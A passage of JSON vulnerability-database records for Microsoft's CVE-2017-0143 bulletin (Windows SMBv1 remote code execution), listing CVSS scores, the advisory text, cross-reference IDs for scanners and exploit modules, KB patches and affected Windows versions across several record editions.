"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012216", "KB4013198", "KB4012213", "KB4012217", "KB3177186", "KB4013429", "KB3210720", "KB3213986", "KB4012215", "KB3212646", "KB4012214", "KB3205409", "KB3205401", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T09:06:55", "differentElements": ["msAffectedSoftware"], "edition": 85}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-01T12:45:41", "history": [], "viewCount": 10, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", 
"SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-10-01T12:45:41", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-01T12:45:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3205401", "KB4012214", "KB3177186", "KB3212646", "KBMS16-110, 3187754", "KB3210721", "KB4012217", "KB4012212", "KB3210720", "KB3213986", "KB4012598", "KB4012215", "KB4013198", "KB3205409", "KB4012216", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": 
"Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": 
"KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": 
""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T12:45:41", "differentElements": ["msAffectedSoftware", "vendorCvss"], "edition": 86}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f324e1b1a767a69b593af7c244e24715", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-04T22:46:36", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "thn", 
"idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB4012213", "KB4012606", "KB4012216", "KB4012598", "KB4013198", "KB3212646", "KB4013429", "KB3213986", "KB3210720", "KBMS16-110, 3187754", "KB3210721", "KB3177186", "KB3205409", "KB4012212", "KB4012217", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 
R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": 